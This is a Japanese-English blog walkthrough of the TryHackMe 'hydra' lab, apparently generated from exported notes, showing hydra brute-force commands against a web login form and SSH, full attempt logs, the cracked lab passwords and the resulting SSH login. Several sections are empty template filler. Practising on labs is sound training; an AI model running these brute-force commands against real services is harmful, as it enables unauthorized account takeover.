Post

TryHackMe - hydra (Linux)

TryHackMe hydra Linux マシン解説。実践的な悪用手順と権限昇格テクニックを解説。

Posted Updated
By Paul
9 min read
TryHackMe - hydra (Linux)

概要

項目 内容
OS Linux
難易度 記録なし
攻撃対象 記録なし
主な侵入経路 web, ssh attack path to foothold
権限昇格経路 Local misconfiguration or credential reuse to elevate privileges

偵察

1. PortScan

Rustscan

💡 なぜ有効か
High-quality reconnaissance narrows a large attack surface into a few validated exploitation paths. Accurate service mapping prevents time loss and supports targeted follow-up testing.

初期足がかり

Not implemented (not recorded in PDF)

Nmap

Not implemented (not recorded in PDF)

2. Local Shell

PDFメモから抽出した主要コマンドと要点を整理しています。必要に応じて後続で詳細追記してください。

実行コマンド(抽出)

1
2
3
4

hydra
hydra -l molly -P /usr/share/wordlists/rockyou.txt $ip http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
hydra -l molly -P /usr/share/wordlists/rockyou.txt $ip ssh
ssh molly@$ip

抽出画像

画像抽出なし(PDF内に有効な埋め込み画像なし)

抽出メモ(先頭120行)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101

hydra
July 19, 2023 1:11

#1
Break through the website login form
┌──(n0z0㉿galatea)-[~/work/thm/hydra]
└─$ hydra -l molly -P /usr/share/wordlists/rockyou.txt $ip http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal
purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-19 00:58:07
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.191.239:80/login:username=^USER^&password=^PASS^:F=incorrect
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "654321" - 17 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "michael" - 18 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "ashley" - 19 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "qwerty" - 20 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "111111" - 21 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "iloveu" - 22 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "000000" - 23 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "michelle" - 24 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "tigger" - 25 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "sunshine" - 26 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "chocolate" - 27 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "password1" - 28 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "soccer" - 29 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "anthony" - 30 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "friends" - 31 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "butterfly" - 32 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "purple" - 33 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "angel" - 34 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "jordan" - 35 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "liverpool" - 36 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "justin" - 37 of 14344399 [child 3] (0/0)
OneNote
1/3
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "loveme" - 38 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "fuckyou" - 39 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "123123" - 40 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "football" - 41 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "secret" - 42 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "andrea" - 43 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "carlos" - 44 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "jennifer" - 45 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "joshua" - 46 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "bubbles" - 47 of 14344399 [child 15] (0/0)
[80][http-post-form] host: 10.10.191.239   login: molly   password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-19 00:58:16
#2
ssh brute force
┌──(n0z0㉿galatea)-[~/work/thm/hydra]
└─$ hydra -l molly -P /usr/share/wordlists/rockyou.txt $ip ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal
purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-19 00:59:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.191.239:22/
[22][ssh] host: 10.10.191.239   login: molly   password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-19 01:00:04
#3
Connect via ssh
┌──(n0z0㉿galatea)-[~/work/thm/hydra]
└─$ ssh molly@$ip
The authenticity of host '10.10.191.239 (10.10.191.239)' can't be established.
ED25519 key fingerprint is SHA256:o25OvvDnTHQn6/0YC3jvtmTZGtm2mJC5oLo+FE+2LFw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.191.239' (ED25519) to the list of known hosts.
molly@10.10.191.239's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-1092-aws x86_64)
* Documentation:  https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage
65 packages can be updated.
32 updates are security updates.
Last login: Tue Dec 17 14:37:49 2019 from 10.8.11.98
molly@ip-10-10-191-239:~$
molly@ip-10-10-191-239:~$
molly@ip-10-10-191-239:~$ ls -la
OneNote
2/3
OneNote
3/3

Not implemented (not recorded in PDF)

💡 なぜ有効か
Initial access succeeds when enumeration findings are turned into a practical exploit chain. Capturing credentials, file disclosure, or direct RCE creates reliable pivot points for privilege escalation.

権限昇格

3.Privilege Escalation

Privilege elevation related commands extracted from PDF memo.

💡 なぜ有効か
Privilege escalation depends on chaining local weaknesses such as sudo misconfiguration, weak file permissions, or credential reuse. If a GTFOBins technique is used, the mechanism is that an allowed binary executes a child process or shell without dropping elevated effective privileges.

認証情報

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

┌──(n0z0㉿galatea)-[~/work/thm/hydra]
└─$ hydra -l molly -P /usr/share/wordlists/rockyou.txt $ip http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-19 00:58:07
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.191.239:80/login:username=^USER^&password=^PASS^:F=incorrect
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "password1" - 28 of 14344399 [child 10] (0/0)
2026/02/27 18:46
[80][http-post-form] host: 10.10.191.239   login: molly   password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-19 00:58:16
└─$ hydra -l molly -P /usr/share/wordlists/rockyou.txt $ip ssh
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-19 00:59:50
[22][ssh] host: 10.10.191.239   login: molly   password: butterfly
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-19 01:00:04
ED25519 key fingerprint is SHA256:o25OvvDnTHQn6/0YC3jvtmTZGtm2mJC5oLo+FE+2LFw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
molly@10.10.191.239's password:

まとめ・学んだこと

4.Overview

flowchart LR
    subgraph SCAN["🔍 Scan"]
        direction TB
        S1["Port and web enumeration"]
    end

    subgraph INITIAL["💥 Initial Foothold"]
        direction TB
        I1["Initial foothold from extracted workflow"]
    end

    subgraph PRIVESC["⬆️ Privilege Escalation"]
        direction TB
        P1["Privilege escalation from extracted notes"]
    end

    SCAN --> INITIAL --> PRIVESC

参考文献

  • nmap
  • rustscan
  • hydra
  • ssh
  • GTFOBins
TryHackMe, Linux
rce suid php privilege-escalation
This post is licensed under CC BY 4.0 by the author.